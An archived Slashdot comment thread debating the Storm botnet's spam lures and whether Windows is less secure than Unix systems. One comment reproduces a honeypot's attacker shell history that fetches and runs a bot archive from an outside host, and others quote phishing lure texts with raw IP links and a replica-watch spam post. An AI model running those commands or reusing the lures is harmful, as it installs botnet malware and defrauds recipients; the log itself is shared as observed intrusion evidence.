No photo proof of a score from a *NIX rig, vs. what I produce as a challenge to those that say "Windows is less secure than (insert *NIX variant here)" as to a result on a valid multiplatform security benchmark...

Put your monies where you mouths are boys!

Just beat the 85.185/100 score I can obtain using Windows Server 2003 SP #2 fully patched & custom security hardened, with the *NIX of YOUR choice... & put up photo proof (unedited, because one fool said he could do that, how WEAK!)...

Simple.

APK

P.S.=> BOTTOM-LINE: Talk's cheap boys... especially "F.U.D."-based b.s. like:

"(Insert *NIX variant here) is more secure or securable than Windows!"

That I see here @ /., worse than any other website online in fact. I don't mind it if it has some basis in verifiable facts with examples, but I do when that statement or one like it, has none of the aforementioned requirements.

So - "Put up, or shut up"... prove it. Put your monies where your mouths are... & with YOUR OWN SYSTEM, not someone else's tests or info. (the BEST test, not only of your big talk, but of YOUR SKILLS IN PERSONALLY KNOWING HOW TO HARDEN YOUR *NIX RIGS, vs. mine on Windows Server 2003).

Download, & install CIS TOOL (@ the center for internet security's website, link is in the URL below):

CIS TOOL DOWNLOAD PAGE @ THE CENTER FOR INTERNET SECURITY:

http://www.cisecurity.org/index.html [cisecurity.org]

(... run it, & beat that score I get on a Windows NT-based OS of 85.185/100 currently, & on a legitimate multiplatform test of security (noted by COMPUTERWORLD & SANS, 2 sites often cited here @ /., no less, in security-oriented threads no less) called CIS TOOL))... apk

Re:Weak, as I expected vs. my challenge... apk (1)

jguthrie (57467) | more than 7 years ago | (#20364341)

The Debian Linux "test" is a PDF file describing how to secure my system, I downloaded it, but couldn't figure out how to compute my score.

Re:Arggg! (4, Insightful)

DaleGlass (1068434) | more than 7 years ago | (#20363367)

Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that ocassionally comes online, or a big Linux/Solaris/whatever server on a DS3? Because while Linux may not be very popular as a desktop OS, it's certainly common as a server. And servers tend to have much better connections than a normal computer.

Linux in its default configuration has no open ports and can be installed safely without a firewall defending it. Can't say the same about many MS OSes. Certainly not Windows 9x, of which there's still a lot of copies running out there (and not supported anymore, thanks MS!)

Re:Arggg! (1)

grommit (97148) | more than 7 years ago | (#20363565)

Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that ocassionally comes online, or a big Linux/Solaris/whatever server on a DS3?

I'd pick Option C: Millions of Windows 2000/XP boxes connected to cable/dsl.

Re:Arggg! (1)

DaleGlass (1068434) | more than 7 years ago | (#20363683)

I'd pick Option C: Millions of Windows 2000/XP boxes connected to cable/dsl.

A good deal of which have ISPs that block outgoing connections on port 25, which isn't a problem for servers.

Re:Arggg! (1)

Professr3 (670356) | more than 7 years ago | (#20364017)

Let's see... host on grandma's (non-geek) box, or a Linux/Solaris/whatever server on a DS3 (with sysadmins who will hunt you down across half the 'net). I am beginning to understand why they chose the way they did.

Re:Arggg! (1)

Sancho (17056) | more than 7 years ago | (#20364035)

Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that ocassionally comes online, or a big Linux/Solaris/whatever server on a DS3? Because while Linux may not be very popular as a desktop OS, it's certainly common as a server. And servers tend to have much better connections than a normal computer.
Servers are going to be more highly scrutinized. Where I work, we have multiple IDS watching the network, and bandwidth monitors that watch for spikes. If a host started using up any significant amount of our bandwidth, we'd know, and we'd shut it down. Not so for most home computers. Bot infections can last for years on home computers when the user doesn't know that there's something wrong, or that they need to fix something.

Linux in its default configuration has no open ports and can be installed safely without a firewall defending it. Can't say the same about many MS OSes. Certainly not Windows 9x, of which there's still a lot of copies running out there (and not supported anymore, thanks MS!)
Linux is a kernel. A distribution of Linux could easily have open ports, and could have vulnerabilities in those services.

Re:Arggg! (1)

rattis (125942) | more than 7 years ago | (#20364715)

Actually some Linux Distro's do have open ports. One of the first things I do when I install a distro at work is run nmap to get a list, and then start closing them ports I don't want open. Usually those are Redhat / RPM based distros.

I do the same thing at home. Where I run Debian / Dpkg distros.

Re:Arggg! (1)

Crazy Taco (1083423) | more than 7 years ago | (#20364737)

Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that ocassionally comes online, or a big Linux/Solaris/whatever server on a DS3? Because while Linux may not be very popular as a desktop OS, it's certainly common as a server. And servers tend to have much better connections than a normal computer.

If I was a spammer, I would CLEARLY rather have grandma's Win98 box host my spambot. And I'm not being sarcastic, either. Just think about this for a second. You talk about a big Linux server on DS3 being better for a botnet. Big servers typically have big IT support staffs running them. How long do you think it is going to take network personnel to notice a server spitting out a lot of spam or infecting emails. I'm not going to take a guess as to how long it would take to fix the problem, but I would bet money that at most organizations infections like that are detected within the day, if not within an hour or two.

So great, you've just compromised you big Linux server, and within a day it gets cleaned up. So you have to find a totally new exploit and try to do it again. And maybe you exploit it again, and then it gets cleaned up again. Contrast that with grandma's Win98 box... she will NEVER know she is sending out spam, and will consequently take NO ACTION to clean it up. If you are going to the trouble of assembling a huge botnet for profits, you want a botnet that is going to have operational capacity for a good length of time, as that is your source of income. You have much better odds of keeping control of user's desktop PC than you do of flying under the IT staff's radar. The minute you try to use their machine as a spambot, they will pull the network connection. You can use grandma's PC again, and again, and again.

Oh, one last point... your comparison of grandma's win98 box to a server is very naive. Yes, one on one, the server completely outperforms the grandma box, but when you have multiple millions of grandma boxes, and the potential to infect tens or hundreds of millions more, the power CLEARLY lies with the desktop machines. Reason 1: We've seen many times that grids of desktops, through their sheer number, can outperform the fastest supercomputers. Reason 2: Ignoring the fact that servers have IT staff, you still have to contend with the fact that the server market uses less machines by far, and that those machines are fragmented by OS. Your exploit that targets Linux can only potentially capture a fraction of the server market, as many others run Solaris, HP UX, Windows Server, etc. With desktops, the market is FAR larger, and consolidated with a single OS. Clearly you want to target the largest market, and the fact that that market also has the least policing by IT professionals makes it an even bigger sweet spot. If I'm a spammer, I'm TOTALLY going for the desktops when making a botnet. QED.

Re:Arggg! (1, Insightful)

Anonymous Coward | more than 7 years ago | (#20363625)

It is a rather odd activity, discounting one excuse for another, when in fact both are part of the bigger picture. You can argue that the popularity of the Windows OS makes it a targer for these sorts of attacks, and it is quite likely true that this family does make a larger target toa ttack that the other consumer-grade operating systems. But this obviously ignores the fact that bigger targets don't always equal less secure. There is no reason that should the situation be reversed and another OS be dominant, that this particular issue would be as bad.

For example, let us assume that Windows and Operating system Y have equal market share at 45% each. OSY comes with most services disabled, Windows comes with most services enabled, which consequently increases the number of attack vectors. Which OS would you target?

So while you raise an important point about popularity, security practices as the designer, OS, and client levels are also at fault.

Windows is inherently less secure (4, Informative)

argent (18001) | more than 7 years ago | (#20363691)

the reason Windows gets hacked is because there are so many more MS machines than any other type of machine.

If that was the case, then why are Microsoft applications (like IIS) more often compromised than non-Microsoft applications even in areas where Microsoft is NOT dominant?

Windows is inherently less secure than most of the competition in a number of ways.

1. The Microsoft HTML control's use of ActiveX is inherently insecure and can not be fixed without breaking every application that uses the HTML control.
1a. This insecure design was deliberate and Microsoft fought the Justice Department to a standstill rather than change or replace it.
2. Windows requires a number of insecure services to run to perform routine operations.
2a. There is no way to force these services to be run local-only without using a firewall.
2b. This means that Windows Firewall has to be used to secure Windows to the same degree as a UNIX based system WITHOUT a firewall.
3. Windows document formats are still based on serialized COM objects. It's even possible for them to include serialized COM objects in XML files.
3a. Serialized COM objects can refer to or even contain insecure code that can be used for an attack.

The idea that any one of these three issues and theor consequent corollaries are accepted boggles my mind. The idea that they're defended by the claim that the only reason Windows is more often compromised is that it is more common...I can not conceive of the confusion in the mind that would lead to such a conclusion.

Re:Windows is inherently less secure (3, Informative)

Anonymous Coward | more than 7 years ago | (#20364107)

IIS 6 has never had a remote root, and it's four years old.

Re:Windows is inherently less secure (2, Insightful)

argent (18001) | more than 7 years ago | (#20364235)

1. The point is that popularity is not the only or even the primary reason why a product can be attacked.
1a. Back in the old "classic" Mac era the Mac went through a period where it was the prime target for attacks, despite it having a fraction of the market, simply because it had such a huge surface area to attack.
1b. Apple responded to many exploits (for example, in autorun CDs and floppies) by removing dangerous capabilities.
1c. Similarly, UNIX systems usually don't come with the "r" suite enabled or often even installed any more.
2. The problems I listed have not been fixed or even addressed by Microsoft.
2a. Windows is still vulnerable to autorun attacks in CDs and USB keys.
2b. Windows still comes with dangerous components like SMS.
3. http://archives.neohapsis.com/archives/fulldisclos ure/2005-04/0400.html [neohapsis.com]

Re:Arggg! (0)

Anonymous Coward | more than 7 years ago | (#20364637)

JamesRose, you're a massive dickhead. Gotta 3 clueless naabs like you.

Now THESE guys... (1)

Mr. Yetti (1139445) | more than 7 years ago | (#20363397)

...are more like the "terrorists" the government keeps telling us to cower under our desks from. I don't spend every morning checking under my hood and in my trunk to see if some guy with his head in a towel (-- that was to make a point, not my opinion) has managed to sneak a bomb in there. I _do_, however, check my inboxes everyday to delete the 30-40 spam/infected emails that show up.

Exchange 2003 SP2 IMF (1)

DigiShaman (671371) | more than 7 years ago | (#20363401)

Unless you've got GFI or Symantec Mail Security, I'd suggest setting up IMF. It's a free spam filter included in Exchange 2003 SP2. Below is a link to get you started.

http://www.petri.co.il/block_spam_with_exchange200 3_imf.htm [petri.co.il]

Obviously it doesn't prevent the spreading of SPAM, but it doesn't mean you have to live with the incoming onslaught.

Famous repl1ca w4tches r0lex Cartier Bvlgari (-1, Offtopic)

Anonymous Coward | more than 7 years ago | (#20363453)

Have you always wanted a R0lex, but don't want to pay high prices for a brand name w4tch? Then you need to visit Prest1ge Repl1cas, a website dedicated exclusively to high quality repl1cas, with the most extensive inventory on the web and a proven track record of satisfied customers. http://www.shegebb.com/ [shegebb.com] Prest1ge Repl1cas offers hundreds of R0lex repl1ca w4tches starting just above $100, and during this summer season, their already low prices have been slashed by 15 percent if you buy two or more w4tches! No matter which model R0lex you choose, their 15% discount applies to them all! But don't let this limited time offer go by... summer is ending
and it's time to impress your friends with a realistic, high quality R0lex
repl1ca w4tch, that will look and perform just like the real deal!
http://www.shegebb.com/ [shegebb.com]



If you want to be excluded from th1s ma1ling
http://www.shegebb.com/m0veme/ [shegebb.com]
We will process your request in 48hr's

Interesting Question (2, Interesting)

spikedvodka (188722) | more than 7 years ago | (#20363511)

This whole scenario brings up a rather interesting question: Is this a Spam problem, or a virus problem?

From my understanding there is no viral content in the message, so your virus scanner would have no reason to block the message. A Spam filtering company could well "pass the buck" and say that this is a virus problem, yes it's going to trigger on some spam rules, but "Where it's a virus problem, why create special rules for it"

I can see this type of attack becoming more popular in the future, at least until this question is solved.

If only they could use the botnet for the good... (3, Funny)

Jafafa Hots (580169) | more than 7 years ago | (#20363649)

... of all mankind. A distributed computing project for the benefit of the human race. Like, cracking blu-ray DRM or something.

It's not just windows they're exploiting... (5, Interesting)

nick13245 (681899) | more than 7 years ago | (#20363663)

For instance, here's a recent attack to my honeypot (Running Slackware Linux)

root@zomg:~# cat /home/webmaster/. ./ .bash_history .ssh/ ../ .screenrc .xsession
root@zomg:~# cat /home/webmaster/.bash_history
ssh localhost
w
cat /etc/hosts
cat /proc/cpuinfo
passwd
cd /var/tmp
ks
l
sl
ls
ls- all
ls -all
mkdir " "
cd " "
clear
wget imaginez0r.xhost.ro/botme.tar.gz
tar zxvf botme.tar.gz
rm -rf botme.tar.gz
cd .bot/
PATH=.:$PATH
bash

These kind of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.

Re:It's not just windows they're exploiting... (2, Interesting)

MarkRose (820682) | more than 7 years ago | (#20364401)

Interestingly enough, imaginez0r.xhost.ro/botme.tar.gz is still available for download. Looks like the bot is controlled by IRC.

was wondering about that (1)

v1 (525388) | more than 7 years ago | (#20363669)

social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video.

I don't normally get much spam - maybe one every other week, but I've gotten two of those lately

OMG, what are you doing man. This video of you is all over the net. go look at it... http://www.youtube.com/watch?v=lAC5mj7oew5 [youtube.com] (link goes to http://90.31.69.105/ [90.31.69.105] )

and

LMAO, I cant believe you put this video online. Everyone can see your face there. LOL check it out yourself http://www.youtube.com/watch?v=ZKil6gyJXhQ [youtube.com] (link goes to http://79.178.78.71/ [79.178.78.71] )

Look at all the retards with their owned boxes lowering our quality of life...

Idiot-proofing the ultimate tool (5, Insightful)

quokkapox (847798) | more than 7 years ago | (#20363783)

You know, I can go and buy a microwave oven and plug it safely into a standardized outlet and not electrocute myself or blow up my house. I can even buy a propane tank and fire up my grill without risking my life too much. I can buy a modern automobile and feel confident that if I drive it into a tree at 30 MPH or roll it over, I still have a reasonable chance of surviving. Most things have built-in standardized safety features and/or safe failure modes (within reason).

These things I can buy are all tools, some with licensing or age restrictions attached, but all more-or-less idiot-proofed. The razor blades I bought recently to scrape paint off my windows even warned me that they were "razor sharp". Well duh.

But the most sophisticated, most powerful, most versatile, general purpose tool we humans have yet invented, the networked personal computer, has been sold to and is used by millions of people without any training whatsoever and without any warnings outside of what one might pick up from the "Dangers in Cyberspace" fluff segment on the local news.

People are using computers more and more to organize all of their critical financial information. A single security breach can have catastrophic, real consequences, if for example your identity is stolen and your credit is ruined after your bank accounts are drained overnight.

All you have to do is click on one really bad link. Sometimes, not even that.

This is just another example of how technology is changing human society in completely unpredictable ways. Back in the 80's, you might have worried about a virus wiping out your word processing file. Today, typing your username and password on an untrusted machine, even just once, can compromise your entire life, and ruin your future.

Re:Idiot-proofing the ultimate tool (1)

Lord Balto (973273) | more than 7 years ago | (#20364065)

This is a variation on what I call the Washing Machine Analogy. I originally invented it because I got tired of having to reboot my machine to "fix" certain problems. My response was that if I bought a washing machine that I had to unplug and then plug back in to get it to work, I'd take the damn thing back to the store and buy another brand.

Re:Idiot-proofing the ultimate tool (4, Insightful)

MrMr (219533) | more than 7 years ago | (#20364625)

On the planet where I live, people are obliged to take practical and theoretical exams, to buy insurance for damage they may cause to others, and still the streets are full of armed government officials to make sure none of the hundreds of detailed rules are broken. This is considered a sane precaution to reduce road traffic accidents.
Extrapolating that I'm guessing that in a couple of decades the "I don't know what my computer does, so it's not my problem" defense is going to be as acceptable as "of course I ran over your daughter, I cannot drive a car at all".

Re:Idiot-proofing the ultimate tool (1)

Kjella (173770) | more than 7 years ago | (#20364849)

You talk as if this is an unsolved problem. There's a range of solutions that could be used from using two-factor authentication, a non-networked computer, a "no-play" locked down computer where you don't block everything in firewall and don't install anything funny or even surf around, a webTV like device sold by online banks or any other number of variations. People don't want it, they want to do everything on their general purpose machine, which tells me it doesn't happen often enough or doesn't hurt enough.

It's as if your boss told you there's only going to be one server which will be your internal test, production and public webserver. There's really one solution - don't do it that way (or you can maybe hack up something with a VMware server but I still wouldn't touch that with a ten foot pole). Trying to make something people install various bits and pieces of code from all over the place on secure, is trying to make water not wet.

It doesn't work on us not because of sudo but because we got this alarm, not anywhere in the computer but up in our heads, that says "okaaaaaaaay running/allowing this is probably not a good idea". Most people don't have and will never have that alarm. The only thing that'll protect them is to limit their compromise. Then you have to deal with the spam bot in some other way. For one, ISPs coming down hard on boxes sending it out would be a good start...

stupid motherfuckers (0)

Anonymous Coward | more than 7 years ago | (#20363787)

I'd like to strangle every one of them- the botnet herders, the assholes buying their services, the piss-poor vendors who sell insecure systems, and the sheeple who run unpatched Windows. I'm on OS X, fully-patched, and still get this crap every day. What a
waste of the world's resources.

You have an greeting card from an mate (click!) (1)

voidy (1003912) | more than 7 years ago | (#20363809)

I must say, it's good to know where all that was coming from. I rarely get spam, as I use a mailserver with greylisting, and any spam I do get is generally filtered correctly using Amavis/Spamassassin and ClamAV. This greeting card stuff though has plagued me. It's been marked as spam alright, but it looks like the botnets are starting to use proper SMTP servers to relay now, rather than just one shot attempts to directly connect to mailservers on port 25. A lot of outgoing traffic on port 25 is blocked from most ADSL networks nowadays, so it's more common to have to relay through your ISP's, or another relay server. This is going to make greylisting redundant pretty soon, as it works purely on the basis that any client connection which fails first time, will try again later as per the RFC's. If the Bots are relaying through RFC compliant servers, then there really isn't any point in the greylisting anymore. It's just a technology that provides a little temporary relief from the problem. Nice to know why the greeting card stuff started and stopped so abrubtly regardless.

~boooodc/bin.php in apache log files (0)

Anonymous Coward | more than 7 years ago | (#20363815)

Has anyone been seeing get requests for ~boooodc/bin.php in their log files? This has been happening to me for a month. Some are even trying to use my host as a proxy to get this from other IPs. A google search has only shown 5 entries and they look to be publically accessible log files.

Is there a point to this torture anymore? (1)

Dachannien (617929) | more than 7 years ago | (#20364037)

After all this time and all these spams, isn't it fairly reasonable to assume that nearly everyone who is going to get their box owned by the trojan already has?

Does Storm Only Attack Windows? (4, Insightful)

Nom du Keyboard (633989) | more than 7 years ago | (#20364093)

Does Storm only attack Windows? Likely yes, I'm sure. Shouldn't Microsoft be attacking this one specifically with their malicious software scanner that's part of every Windows Update?

Easy to prevent this problem in Outlook (0)

Anonymous Coward | more than 7 years ago | (#20364701)

I have my Outlook set to show all messages in text (instead of HTML or richtext), and the 'reading pane' option is turned off so that I actually have to click on the email header to open the message. Most of the time I can recognize the spam just by the message title, and I delete it without reading or opening the email. By setting everything to text, it makes any imbedded web links unclickable, but I guess I'm preaching to the choir here. You people know this stuff. It's the noobies that need the advice.

I also refuse to click on any links sent to me by friends. 'WOW COOL VIDEO MUST WATCH THIS ONE!' I get phone calls later on, asking if I thought the video clip was funny. I have to tell them I don't know, since I deleted the message. Since I make my living with this computer, I can't afford to do something stupid and mess it up by downloading someone else's junk, spam, virus or botnet.

Does it read slashdot? (1)

bobintetley (643462) | more than 7 years ago | (#20364807)

Maybe it's just coincidence, but I've been bombarded with the e-card things for a while now, and the youtube thing for a couple of days or so. Since this story broke on Slashdot, I just checked the spam trap and I haven't had a single one for the last 12 hours or so...

Disconnect them (1)

LordSnooty (853791) | more than 7 years ago | (#20364957)

Form a team of investigative experts. Find all the machines in a botnet and ask their ISP to disconnect them. If an ISP refuses to cooperate, get their upstream provider involved and start threatening disconnection for all users. They'll soon fall into line.

Post reasons why this is a bad idea here. I'm beginning to have difficulty understanding why so little action is being taken.
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?